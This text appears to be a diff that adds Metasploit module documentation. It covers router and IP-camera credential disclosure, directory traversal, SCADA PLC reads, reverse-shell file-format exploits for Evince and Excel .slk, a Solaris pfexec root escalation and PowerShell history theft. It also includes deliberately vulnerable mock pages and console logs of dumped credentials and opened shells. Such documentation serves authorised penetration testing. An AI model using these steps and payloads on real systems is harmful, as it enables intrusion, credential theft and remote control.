+var pw_retype2 = "56789";
+var pw_autolock = "0";
+DATA
+
+if ($Q::page == 2) {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+    resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
+    resource (c2s.rb)> set rhosts 127.0.0.1
+    rhosts => 127.0.0.1
+    resource (c2s.rb)> set verbose true
+    verbose => true
+    resource (c2s.rb)> exploit
+    [*] Attempting to load data from /cgi-bin/read.cgi?page=2
+    [+] Found: admin:12345
+    [+] Found: user:56789
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+    [*] Starting persistent handler(s)...
+    msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
+    Credentials
+    ===========
+    
+    host       origin     service        public  private  realm  private_type
+    ----       ------     -------        ------  -------  -----  ------------
+    127.0.0.1  127.0.0.1  80/tcp (http)  admin   12345           Password
+    127.0.0.1  127.0.0.1  80/tcp (http)  user    56789           Password
+  ```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+[CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router.  The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
+
+An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
+
+More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
+
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. `use auxiliary/gather/cisco_rv320_config`
+ 3. `set RHOSTS 192.168.1.1` (default LAN IP) or to the WAN interface
+ 4. `run`
+ 5. Review the downloaded configuration file cited in the output.  For example:
+>```
+>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_192.168.1.1_cisco.rv.config_791561.txt
+>```
+ 6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
+
+## Options
+
+*SSL*: Should be set to 'true' for port 443 and set to 'false' for port 80 or port 8007.
+
+*TARGETURI*: Should point to the `/cgi-bin/config.exp` endpoint and likely should never be changed.
+
+## Scenarios
+
+#### Against firmware version 1.4.2.15, on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
+RHOSTS => 203.0.113.54
+msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
+RPORT => 8007
+msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
+SSL => false
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against firmware version 1.4.2.17, on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched
+[*] Auxiliary module execution completed
+```
+
+#### If module succeeds, check the database:
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > hosts
+
+Hosts
+=====
+
+address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
+-------      ---                ----          -------  ---------  -----  -------  ----  --------
+203.0.113.54 70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+192.168.1.1  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+```
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > creds
+Credentials
+===========
+
+host         origin       service          public  private                            realm  private_type
+----         ------       -------          ------  -------                            -----  ------------
+203.0.113.54 192.168.1.1  8007/tcp (http)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+```
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > loot
+
+Loot
+====
+
+host         service  type             name  content     info  path
+----         -------  ----             ----  -------     ----  ----
+203.0.113.54          cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206213439_default_203.0.113.54_cisco.rv.config_791561.txt
+192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
+```
@@ -0,0 +1,62 @@
+## Description
+
+  SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),
+  and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)
+  allow an unauthenticated user to disclose the username & password by
+  requesting the javascript page 'readfile.cgi?query=ADMINID'.
+  Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/readfile.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+my $data = <<'DATA';
+var Adm_ID="admin";
+var Adm_Pass1="password";
+var Language="en";
+var Logoff_Time="0";
+DATA
+if ($Q::query == "ADMINID") {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/ipcamera_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+  msf5 > use auxiliary/gather/ipcamera_password_disclosure 
+  msf5 auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1
+  rhosts => 127.0.0.1
+  msf5 auxiliary(gather/ipcamera_password_disclosure) > run
+  
+  [+] Found: admin:password
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,54 @@
+## Description
+
+This module will connect to a provided range of web severs and determine if directory listings are enabled on them.
+
+## Vulnerable Application
+
+This module has been verified against the web server listed below.
+
+### Mock Vulnerable Server
+
+These instructions will create a web sever using `apache` with directory listing vulnerability enabled on it.
+
+#### Setup
+
+1. Create the `.htaccess` file with the vulnerable configuration: `echo 'Options +Indexes' > /var/www/html/.htaccess`
+2. Start the apache server `service apache2 start`.
+
+#### Note 
+
+ake sure you dont have an `index.html` file in your `/var/www/html` for the vulnerability to work.
+
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/dir_listing```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+### Against the Mock server listed above
+
+```
+msf > use auxiliary/scanner/http/dir_listing
+msf auxiliary(scanner/http/dir_listing) > set RHOSTS 1.1.1.10-14
+RHOSTS => 1.1.1.10-14
+msf auxiliary(scanner/http/dir_listing) > set THREADS 4
+THREADS => 4
+msf auxiliary(scanner/http/dir_listing) > set verbose true
+verbose => true
+msf auxiliary(scanner/http/dir_listing) > run
+
+[-] The connection was refused by the remote host (1.1.1.13:80).
+[*] NOT Vulnerable to directory listing http://1.1.1.13:80/
+[-] The connection was refused by the remote host (1.1.1.12:80).
+[*] NOT Vulnerable to directory listing http://1.1.1.12:80/
+[*] NOT Vulnerable to directory listing http://1.1.1.11:80/
+[*] Scanned 3 of 4 hosts (75% complete)
+[+] Found Directory Listing http://1.1.1.14:80/
+[*] Scanned 4 of 4 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/dir_listing) >
+```
@@ -0,0 +1,31 @@
+## Description
+
+This module scans a given range of IP address and queries web servers for the options that are available on them.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/options```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/options
+msf auxiliary(scanner/http/options) > set RHOSTS 192.168.1.200-210
+RHOSTS => 192.168.1.200-210
+msf auxiliary(scanner/http/options) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/http/options) > run
+
+[*] 192.168.1.203 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
+[*] 192.168.1.204 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
+[*] 192.168.1.205 allows OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK methods
+[*] 192.168.1.206 allows OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK methods
+[*] 192.168.1.208 allows GET,HEAD,POST,OPTIONS,TRACE methods
+[*] 192.168.1.209 allows GET,HEAD,POST,OPTIONS,TRACE methods
+[*] Scanned 11 of 11 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/options) >
+```
@@ -0,0 +1,48 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,
+  allowing to read arbitrary files with the web server privileges.
+
+
+## Vulnerable Application
+
+  [RIPS](http://rips-scanner.sourceforge.net/) is a static source code analyser
+  for vulnerabilities in PHP scripts.
+
+  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)
+
+
+## Verification
+
+  1. Start `msfconsole`
+  2. `use auxiliary/scanner/http/rips_traversal`
+  3. `set RHOSTS <rhost>`
+  4. `set FILEPATH </path/to/file>`
+  5. `run`
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/scanner/http/rips_traversal
+  msf5 auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188
+  rhosts => 172.16.191.188
+  msf5 auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts
+  filepath => /etc/hosts
+  msf5 auxiliary(scanner/http/rips_traversal) > run
+  
+   127.0.0.1        localhost
+    
+    # The following lines are desirable for IPv6 capable hosts
+    ::1     localhost ip6-localhost ip6-loopback
+    ff02::1 ip6-allnodes
+    ff02::2 ip6-allrouters
+    
+    127.0.0.1 wpad
+    
+   
+  [+] File saved in: /root/.msf4/loot/20190208082709_default_172.16.191.188_rips.traversal_654208.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+
@@ -0,0 +1,60 @@
+
+## Vulnerable Application
+
+This applies to all versions of SAP software.
+
+The SAP Management Console (SAP MC) provides a common framework for centralized system management. It allows you to monitor and perform basic administration tasks on the SAP system centrally, which simplifies system administration. (https://help.sap.com/doc/saphelp_nwpi711/7.1.1/en-US/fa/ec218eb89b4424a9a0b423b0643952/frameset.htm)
+
+SAP exposes an API on port tcp/50013 with the SOAP Management Console. Some webmethods are authenticated with a valid login/password and others are unauthenticated and reacheable by default.
+
+With this module you can list the config files that SAP loads when starts the SAP server. This unauthenticated information disclosure can be used in a more advanced attack to get knowledge about in which paths SAP stores the config files to, for example, retrieve sensitive data or trojanize the startup process.
+
+## Verification Steps
+
+  Example steps:
+
+  1. Install the SAP application. SAP provides a docker container for development purposes: https://developers.sap.com/tutorials/hxe-ua-install-using-docker.html
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles```
+  4. Set up the server IP: ```set RHOSTS 192.168.10.45```
+  5. Do: ```run```
+  6. You will receive the list of SAP configuration files on the server.
+
+## Options
+
+  **RHOSTS**: Set up which server or servers do you want to test
+
+  **RPORT**: Port tcp/50013 set up by default
+
+  In case of more advanced deployments you can set up the SSL parameters here:
+
+  **SSL**: Set to ```true```
+
+
+## Scenarios
+
+### Example
+
+
+  ```
+msf5 > use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
+msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > show options
+
+Module options (auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    50013            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                yes       The number of concurrent threads
+   URI      /                no        Path to the SAP Management Console 
+   VHOST                     no        HTTP server virtual host
+
+ msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > set RHOSTS 192.168.10.45
+ RHOSTS => 192.168.10.45
+ msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > run
+ [...]
+
+  ```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+  Unitronics Vision PLCs using PCOM protocol
+
+## Verification Steps
+
+  1. Do: `use scanner/scada/pcomclient`
+  2. Do: `set RHOST=IP` where IP is the IP address of the target
+  3. Do: `run` to send PCOM command
+
+ ## Scenarios
+
+   ```
+msf > use scanner/scada/pcomclient
+msf auxiliary(scanner/scada/pcomclient) > show options
+
+Module options (auxiliary/scanner/scada/pcomclient):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   ADDRESS  0                yes       PCOM memory address (0 - 65535)
+   LENGTH   3                yes       Number of values to read (1 - 255) (read only)
+   OPERAND  MI               yes       Operand type (Accepted: Input, Output, SB, MB, MI, SI, ML, SL)
+   RHOST                     yes       The target address
+   RPORT    20256            yes       The target port (TCP)
+   UNITID   0                no        Unit ID (0 - 127)
+   VALUES                    no        Values to write (0 - 65535 each) (comma separated) (write only)
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   READ  Read values from PLC memory
+
+
+msf auxiliary(scanner/scada/pcomclient) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf auxiliary(scanner/scada/pcomclient) > run
+
+[*] 192.168.1.1:20256 - Reading 03 values (MI) starting from 0000 address
+[+] 192.168.1.1:20256 - [00000] : 0
+[+] 192.168.1.1:20256 - [00001] : 1
+[+] 192.168.1.1:20256 - [00002] : 0
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/scada/pcomclient) >
+```
@@ -0,0 +1,21 @@
+## Vulnerable Application
+
+Many devices produced by Ubiquiti are affected by this issue.
+
+## Verification Steps
+
+  1. Locate a network known or suspected to house Ubiquiti devices
+  2. Start msfconsole
+  3. Do: `use auxiliary/scanner/ubiquiti_discovery`
+  4. Do: `set RHOSTS <some_targets>`
+  5. Do: `run`
+
+## Scenarios
+
+  An example run against a Ubiquiti EdgeRouter-X:
+
+
+  ```
+  msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run
+  [+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"}
+  ```
@@ -10,6 +10,7 @@
 * [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
 * [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
 * [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
+* Horde IMP H3

  Prestashop exploitation requires the admin URI, and administrator credentials.

@@ -17,6 +18,8 @@

  e107 v2 exploitation requires administrator credentials.

+  Horde IMP H3 requires the IMP test page to be present (default), but no credentials are required.
+
  Additional applications were reported vulnerable, but exploits were not written. See [#10987](https://github.com/rapid7/metasploit-framework/pull/10987) for additional details.

 ### Prestashop 1.7.2.4 on Ubuntu 16.04
@@ -211,18 +214,69 @@ sudo systemctl restart mysql.server
 sudo systemctl restart mysql.service
 ```

+### Horde IMP H3 on Ubuntu 16.04
+
+This worked until about Jan 11, 2019 when ondrej updated php5.6 passed 38.
+
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+sudo apt-get --no-install-recommends install -y php-pear
+sudo apt-get install -y php5.6 libapache2-mod-php5.6 php5.6-mysql php5.6-mbstring php5.6-mysql php5.6-curl php5.6-xml php5.6-xmlrpc php5.6-imap
+sudo update-alternatives --config php
+sudo a2enmod  php5.6
+sudo a2dismod php7.1
+sudo phpenmod imap
+sudo service apache2 restart
+wget ftp://ftp.horde.org/pub/imp/imp-h3-4.2.tar.gz
+wget ftp://ftp.horde.org/pub/horde/horde-3.3.13.tar.gz
+tar zxf horde-3.3.13.tar.gz
+sudo mv horde-3.3.13 /var/www/html/
+tar zxf imp-h3-4.2.tar.gz
+sudo mv imp-h3-4.2 /var/www/html/horde-3.3.13/
+sudo mv /var/www/html/horde-3.3.13/ /var/www/html/horde
+cd /var/www/html/horde
+sudo mv imp-h3-4.2/ imp
+cd imp/config
+sudo cp mime_drivers.php.dist mime_drivers.php
+sudo cp prefs.php.dist prefs.php
+sudo cp servers.php.dist servers.php
+sudo chown -R www-data:www-data /var/www/html/horde/
+curl -s http://127.0.0.1/horde/imp/test.php | grep "PHP Mail Server Support Test"
+```
+
+Browse to the site, click Administration -> Setup.  Click the caution and stop icons and then "Generate Horde Configuration", and "Generate Mail Configuration".
+The test page is located at `/horde/imp/test.php`.
+
 ### Custom Page on Ubuntu 16.04

 Make sure `php-imap` is installed and enabled.  Create `imap.php` with the following content.

-```
+```php
 <html>
  <body>
-    <p>imap_open example exploitation page.  Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</p>
+    <h1>imap_open Exploitable Page</h1>
+    <p>There are two ways to exploit this page:</p>
+    <ol>
+      <li><b>GET:</b> Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</li>
+      <li><b>POST: </b> Using parameter 'server' or the form below.</li>
+    </ol>
+    <form method="post">
+      Server: <input type="text" name="server"><br>
+      <input type="submit" value="Submit">
+    </form>
 <?php
-  $server = htmlspecialchars($_GET["server"]);
+  if (isset($_GET["server"]) && !empty($_GET["server"])) {
+    $server = htmlspecialchars($_GET["server"]);
+  } else {
+    $server = $_POST["server"];
+  }
+  if (!isset($server) || empty($server)) {
+    exit;
+  }
+  echo "<hr><h2>Results:</h2>";
  $mbox = @imap_open("{".$server.":143}INBOX",'username','password');
-  echo '<p>Received: '.$server.'</p>';
+  echo '<p><b>Received: </b>'.$server.'</p>';

  $errors = imap_errors();
  if (is_array($errors)) {
@@ -236,7 +290,7 @@ Make sure `php-imap` is installed and enabled.  Create `imap.php` with the follo
    $str_errors = rtrim(trim($str_errors), ',');
  }
  if (!$mbox) {
-    echo '<p>Errors: ' . ($str_errors);
+    echo '<p><b>Errors: </b>' . ($str_errors);
  }
 ?>

@@ -0,0 +1,83 @@
+## Description
+
+  This module exploits a command injection vulnerability in Evince
+  before version 3.24.1 when opening comic book `.cbt` files.
+
+  Some file manager software, such as Nautilus and Atril, may allow
+  automatic exploitation without user interaction due to thumbnailer
+  preview functionality.
+
+  Note that limited space is available for the payload (<256 bytes).
+  Reverse Bash and Reverse Netcat payloads should be sufficiently small.
+
+
+## Vulnerable Application
+
+  [Evince](https://wiki.gnome.org/Apps/Evince) is a document viewer
+  for multiple document formats.
+
+  This module has been tested successfully on evince versions:
+
+  * 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6
+  * 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04
+
+
+## Verification Steps
+
+  1. ```use exploit/multi/fileformat/evince_cbt_cmd_injection```
+  2. ```set PAYLOAD <PAYLOAD>```
+  3. ```run```
+  4. The module should generate the malicious `msf.cbt` file
+  5. ```handler -p <PAYLOAD> -H <LHOST> -P <LPORT>```
+  6. Copy `msf.cbt` to target host and open with Evince
+  7. You should receive a new session
+
+
+## Options
+
+  **FILENAME**
+
+  The cbt document file name (default: `msf.cbt`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash
+  payload => cmd/unix/reverse_bash
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run
+
+  [*] Writing file: msf.cbt (1078272 bytes) ...
+  [+] msf.cbt stored at /root/.msf4/local/msf.cbt
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
+  [*] exec: mv /root/.msf4/local/msf.cbt /var/www
+
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler 
+  msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
+  payload => cmd/unix/reverse_bash
+  msf5 exploit(multi/handler) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500
+
+  id
+  uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
+  uname -a
+  Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+  ```
+
+
+## Manual Cleanup
+
+To prevent re-exploitation from a thumbnailer process:
+
+  ```
+  /usr/bin/killall evince-thumbnailer
+  /usr/bin/killall atril-thumbnailer
+  ```
+
@@ -0,0 +1,52 @@
+## Introduction
+
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
+on the target.
+
+## Vulnerable Application
+
+  Microsoft Excel (tested on Excel 2016)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/office_excel_slk`
+3. `set LHOST [IP]`
+4. `set SRVHOST [IP]`
+5. `run`
+6. Open generated file and press 'Enable Content' in Excel
+
+## Options
+
+  **FILENAME**
+
+  The name of the generated .slk file. Default is a randomly generated file name.
+
+## Scenarios
+
+### Microsoft Excel 2016 on Windows 10 Build 17763.288
+
+  ```
+  msf > use exploit/windows/fileformat/office_excel_slk
+  msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf exploit(office_excel_slk) > set lhost 192.168.146.1
+  lhost => 192.168.146.1
+  msf exploit(office_excel_slk) > set srvhost 192.168.146.1
+  srvhost => 192.168.146.1
+  msf exploit(office_excel_slk) > run
+  [*] Exploit running as background job.
+
+  [*] Started reverse TCP handler on 192.168.146.1:4444
+  [+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
+  [*] Using URL: http://192.168.146.1:8080/default.hta
+  [*] Server started.
+  ```
+  
+  Once the victim opens the file and clicks 'Enable Content' a session should spawn:
+
+  ```
+  [*] Sending stage (957487 bytes) to 192.168.146.145
+  [*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500
+  ```
@@ -0,0 +1,59 @@
+## Description
+
+  This module attempts to upgrade a shell session to UID `0` using `pfexec`.
+
+
+## Vulnerable Application
+
+  *  https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html
+  *  http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html
+  *  http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use  post/solaris/escalate/pfexec`
+  4. `set SESSION <SESSION>`
+  5. `run`
+  6. Your session should now have *root* privileges
+
+
+## Options
+
+  **PFEXEC_PATH**
+
+  Path to pfexec (default: `/usr/bin/pfexec`)
+
+  **SHELL_PATH**
+
+  Path to shell (default: `/bin/sh`)
+
+
+## Scenarios
+
+```
+  msf5 > use post/solaris/escalate/pfexec 
+  msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id
+  [*] Running 'id' on shell session 1 (172.16.191.221)
+  uid=100(user) gid=10(staff)
+
+  msf5 post(solaris/escalate/pfexec) > set verbose true
+  verbose => true
+  msf5 post(solaris/escalate/pfexec) > set session 1
+  session => 1
+  msf5 post(solaris/escalate/pfexec) > run
+
+  [*] Trying pfexec as `user' ...
+  [*] uid=0(root) gid=0(root)
+  [+] Success! Upgrading session ...
+  [+] Success! root shell secured
+  [*] Post module execution completed
+  msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id
+  [*] Running 'id' on shell session 1 (172.16.191.221)
+  uid=0(root) gid=0(root)
+
+  msf5 post(solaris/escalate/pfexec) > 
+  ```
+
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+  This post-exploitation module will extract PowerShell history.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/psreadline_history`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see the extracted PowerShell history in the loot files
+
+## Options
+
+  - **SESSION** - The session to run the module on.
+
+## Example Scenario
+
+  **Using the module with a version earlier than PowerShell 5.0**
+
+  In this scenario the module won't be able to work, as in earlier versions of PowerShell, the history of the commands in the current session is not being saved after it is closed.
+
+  **Using the module with PowerShell 5.0+**
+
+  In this scenario the module will try to extract the history file and save it in a loot file.
+
+  ```
+  msf exploit(handler) > use post/windows/gather/psreadline_history 
+  msf post(psreadline_history) > set SESSION 1
+  SESSION => 1
+  msf post(psreadline_history) > run
+
+  [*] Writing history to loot...
+  [*] PSReadline history file of user IEUser saved to /home/user/.msf4/loot/20181223050921_default_10.0.2.15_ps.history_688257.txt
+  [*] Post module execution completed
+  ```
+
+  The extracted history data would look like this:
+
+  ```
+  cd
+  cls
+  1+5
+  Get-Help -Name Get-*
+  Set-ExecutionPolicy Unrestricted
+  Get-Service | Export-CSV c:\service.csv
+  ```
@@ -1,11 +1,12 @@
 #CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
+CFLAGS_32=-fno-stack-protector -fno-exceptions -fPIC -Os -O0
 GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
 GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc`
 GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
-GCC_BASE_IOS=$(GCC_BIN_IOS) $(CFLAGS)
+GCC_BASE_IOS=$(GCC_BIN_IOS)
 GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
 SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path`
-GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \
+GCC_IOS=$(GCC_BASE_IOS) $(CFLAGS) -arch arm64 -isysroot $(SDK_IOS) \
 		-Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \
